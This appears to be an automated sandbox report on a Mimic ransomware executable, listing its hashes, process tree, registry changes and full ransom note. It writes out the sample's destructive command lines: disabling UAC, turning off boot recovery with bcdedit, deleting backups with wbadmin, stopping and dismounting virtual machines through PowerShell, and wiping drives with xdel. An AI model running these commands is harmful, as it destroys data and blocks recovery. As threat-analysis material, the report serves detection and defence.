Analysis
  max time kernel:  290s
  max time network: 204s
  platform:         windows10-2004_x64
  resource:         win10v2004-20241007-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        15/01/2025, 22:18
Static task: static1

Behavioral task: behavioral1
  Sample:   81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample:   81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
  Resource: win10v2004-20241007-en
General
  Target: 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
  Size:   2.6MB
  MD5:    4dedefe4431f91c920d9aaaceb99e2ee
  SHA1:   9a20559fa8a3e670c734837de16fa508d5e25b41
  SHA256: 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72
  SHA512: cb7d2fe42cd44f7b1c31102961c579d7ba5a6e8f5071dfdb372dade85f56572dd870f54ca32b160faa58536f0f40e4ceb39745ae076fb8d546dd358ebe96f086
  SSDEEP: 49152:wgwReifu1DBgutBPN4gJEkSBz4aPUAigHrBYlHYw/s5CH5Ie71yAmiESeJKeqy:wgwRevguPPjg946UAFLBEYw/s5CX7tmj
Malware Config

Signatures
Detects Mimic ransomware (1 IoCs)
  resource:  behavioral2/files/0x000a000000023b7b-37.dat
  yara_rule: family_mimic
Mimic
  Ransomware family first seen in the wild in 2022.
Mimic family

  description      ioc                                                                                                           Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"                   YOURDATA.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  YOURDATA.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"   YOURDATA.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"       YOURDATA.exe
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  pid   Process
  264   bcdedit.exe
  1292  bcdedit.exe
Renames multiple (4518) files with added filename extension
  This suggests ransomware activity: encrypting all the files on the system.
  pid   Process
  3384  wbadmin.exe

  pid   Process
  3040  wbadmin.exe
Event Triggered Execution: Image File Execution Options Injection (1 TTPs, 64 IoCs)
Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up the country code configured in the registry, likely for geofencing.

  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation  81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
Executes dropped EXE (12 IoCs)
  pid   Process
  4572  7za.exe
  4508  7za.exe
  112   2ks.exe
  3036  YOURDATA.exe
  5112  DC.exe
  3100  YOURDATA.exe
  408   YOURDATA.exe
  4480  YOURDATA.exe
  3524  Everything.exe
  4588  Everything.exe
  5508  xdel.exe
  5504  xdel.exe
Loads dropped DLL (5 IoCs)
  pid   Process
  112   2ks.exe
  3036  YOURDATA.exe
  3100  YOURDATA.exe
  408   YOURDATA.exe
  4480  YOURDATA.exe
Modifies system executable filetype association (2 TTPs, 10 IoCs)
  description      ioc                                                                                                          Process
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command               YOURDATA.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command                                                  2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command               2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell                            2ks.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*"  2ks.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*"                                     YOURDATA.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*"                                     2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open                       2ks.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command                                                  YOURDATA.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*"  YOURDATA.exe
Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials and similar secrets.
Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                                                  Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\""              YOURDATA.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA = "\"C:\\Users\\Admin\\AppData\\Local\\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\\YOURDATA.exe\" "  2ks.exe

  description      ioc                                                                                       Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  YOURDATA.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
Power Settings (1 TTPs, 15 IoCs)
  powercfg controls every configurable power setting on a Windows system and can be abused to keep an infected host from locking or shutting down.

  Process: powercfg.exe
  pids: 4156, 1424, 4648, 1524, 1320, 1940, 4276, 2940, 1520, 4436, 3508, 1788, 3764, 780, 1660
Drops file in Program Files directory (64 IoCs)
Drops file in Windows directory (3 IoCs)
  description                   ioc                                            Process
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.3.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.2.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\WBEngine.1.etl  wbadmin.exe

  Process: powershell.exe
  pids: 3644, 2296, 4596
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 16 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  description: Key opened
  ioc:         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Processes (in order observed): 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe, 7za.exe, 7za.exe, YOURDATA.exe, cmd.exe, cmd.exe, 2ks.exe, YOURDATA.exe, YOURDATA.exe, Everything.exe, Everything.exe, xdel.exe, xdel.exe, notepad.exe, DC.exe, YOURDATA.exe
Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
  SCSI information is often read in order to detect sandboxing environments.

  description        ioc                                                                                                                       Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000                    vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName       vds.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000                       vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName          vds.exe
Modifies registry class (19 IoCs)
  description      ioc                                                                                                                                     Process
  Key created      \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command                                                                             YOURDATA.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile                                                                                              YOURDATA.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*"                                                                2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command                                          2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile                                                             2ks.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*"                             2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command                                          YOURDATA.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\mimicfile\shell\open\command                                                                           YOURDATA.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.2000USD\ = "mimicfile"                                                                                 YOURDATA.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\.2000USD                                                                                               YOURDATA.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command                                                                             2ks.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open                                                  2ks.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command                                                                           YOURDATA.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\""  YOURDATA.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open                                                                                   YOURDATA.exe
  Key created      \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell                                                       2ks.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*"                                                                YOURDATA.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*"                             YOURDATA.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell                                                                                        YOURDATA.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process (privileges grouped by process)
4572 7za.exe: Token: SeRestorePrivilege, 35
4508 7za.exe: Token: SeRestorePrivilege, 35, SeSecurityPrivilege (2)
112 2ks.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35, 36
3036 YOURDATA.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35, 36
3100 YOURDATA.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege
408 YOURDATA.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3524 Everything.exe 4588 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target (identical repeated events collapsed; count in parentheses)
PID 1856 wrote to memory of 4572 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 83 (3)
PID 1856 wrote to memory of 4508 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 85 (3)
PID 1856 wrote to memory of 112 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 87 (3)
PID 112 wrote to memory of 3036 112 2ks.exe 88 (3)
PID 3036 wrote to memory of 2432 3036 YOURDATA.exe 89 (3)
PID 2432 wrote to memory of 5112 2432 cmd.exe 91 (3)
PID 3036 wrote to memory of 3100 3036 YOURDATA.exe 94 (3)
PID 3036 wrote to memory of 408 3036 YOURDATA.exe 95 (3)
PID 3036 wrote to memory of 4480 3036 YOURDATA.exe 96 (3)
PID 3036 wrote to memory of 3524 3036 YOURDATA.exe 99 (3)
PID 1856 wrote to memory of 2236 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 103 (3)
PID 3036 wrote to memory of 3508 3036 YOURDATA.exe 124 (2)
PID 3036 wrote to memory of 1320 3036 YOURDATA.exe 125 (2)
PID 3036 wrote to memory of 4436 3036 YOURDATA.exe 127 (2)
PID 3036 wrote to memory of 1524 3036 YOURDATA.exe 129 (2)
PID 3036 wrote to memory of 1788 3036 YOURDATA.exe 130 (2)
PID 3036 wrote to memory of 780 3036 YOURDATA.exe 131 (2)
PID 3036 wrote to memory of 1520 3036 YOURDATA.exe 133 (2)
PID 3036 wrote to memory of 4648 3036 YOURDATA.exe 135 (2)
PID 3036 wrote to memory of 2940 3036 YOURDATA.exe 137 (2)
PID 3036 wrote to memory of 4276 3036 YOURDATA.exe 138 (2)
PID 3036 wrote to memory of 3764 3036 YOURDATA.exe 139 (2)
PID 3036 wrote to memory of 1940 3036 YOURDATA.exe 141 (2)
PID 3036 wrote to memory of 1424 3036 YOURDATA.exe 142 (2)
PID 3036 wrote to memory of 4156 3036 YOURDATA.exe 143 (2)
PID 3036 wrote to memory of 1660 3036 YOURDATA.exe 144 (2)
PID 3036 wrote to memory of 3644 3036 YOURDATA.exe 147 (1)
-
System policy modification 1 TTPs 13 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer YOURDATA.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System YOURDATA.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection YOURDATA.exe
Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System YOURDATA.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" YOURDATA.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Your data on your system has been encrypted by us....\n\nWe want you to know that you will not get your data back with the usual data recovery methods...\n\nWe will restore your data for 3.000 dollars.\n\nYou can send an e-mail with your reference code below\n\nWe Do Not Negotiate \nWe do not give discounts.\nThe price is very reasonable\n\n\n######################################################################\n\nIf you contact me to ask for a discount or to negotiate, I will increase the price I offer.\n\n######################################################################\n\nWhen you send us an e-mail, please send us your reference code below\n\n=> YOUR REFERENCE CODE <=\n\nWO3F1OCfZ_OOmh0E6lwLOdNfpzicHisJOLAXRijbj3o*[email protected]\n\n=> OUR E-MAIL ADDRESS <=\n\[email protected]\[email protected]\[email protected]\n\nIf you do not receive a reply from the above e-mail within 24 hours, you can also contact the following e-mail address\n\n=> OUR SECOND E-MAIL ADDRESS <=\n\[email protected]\n\n" YOURDATA.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " YOURDATA.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p731121544783912138 Everything64.dll
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2ks.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2ks.exe"
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:112
-
Depth 3: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3036
-
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command line: cmd.exe /c DC.exe /D
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432
-
Depth 5: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\DC.exe
Command line: DC.exe /D
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5112
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e watch -pid 3036 -!
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e ul1
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e ul2
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4480
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe" -startup
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3524
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -H off
- Power Settings
PID:3508
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:1320
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:4436
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:1524
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:1788
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:780
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:1520
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:4648
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:2940
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:4276
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:3764
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:1940
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:1424
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
- Power Settings
PID:4156
-
Depth 4: C:\Windows\SYSTEM32\powercfg.exe
Command line: powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
- Power Settings
PID:1660
-
Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3644
-
Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2296
-
Depth 4: C:\Windows\SYSTEM32\bcdedit.exe
Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- Modifies boot configuration data using bcdedit
PID:264
-
Depth 4: C:\Windows\SYSTEM32\bcdedit.exe
Command line: bcdedit.exe /set {default} recoveryenabled no
- Modifies boot configuration data using bcdedit
PID:1292
-
Depth 4: C:\Windows\SYSTEM32\wbadmin.exe
Command line: wbadmin.exe DELETE SYSTEMSTATEBACKUP
- Deletes System State backups
- Drops file in Windows directory
PID:3384
-
Depth 4: C:\Windows\SYSTEM32\wbadmin.exe
Command line: wbadmin.exe delete catalog -quiet
- Deletes backup catalog
PID:3040
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe" -startup
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4588
-
Depth 4: C:\Windows\SysWOW64\notepad.exe
Command line: notepad.exe "C:\Users\Admin\AppData\Local\----Read-Me-----.txt"
- System Location Discovery: System Language Discovery
PID:5400
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe" -accepteula -p 1 -c C:\
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508
-
Depth 4: C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe
Command line: "C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe" -accepteula -p 1 -c F:\
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5504
-
Depth 2: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
- System Location Discovery: System Language Discovery
PID:2236
-
Depth 1: C:\Windows\System32\Systray.exe (10 instances with the same command line)
Command line: C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:3132, PID:4440, PID:4568, PID:2576, PID:1184, PID:2840, PID:4760, PID:4152, PID:5744, PID:5760
-
Depth 1: C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
PID:4332
-
Depth 1: C:\Windows\system32\wbengine.exe
Command line: "C:\Windows\system32\wbengine.exe"
PID:1424
-
Depth 1: C:\Windows\System32\vdsldr.exe
Command line: C:\Windows\System32\vdsldr.exe -Embedding
PID:4180
-
Depth 1: C:\Windows\System32\vds.exe
Command line: C:\Windows\System32\vds.exe
- Checks SCSI registry key(s)
PID:2888
Network
MITRE ATT&CK Enterprise v15 (technique counts in parentheses)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
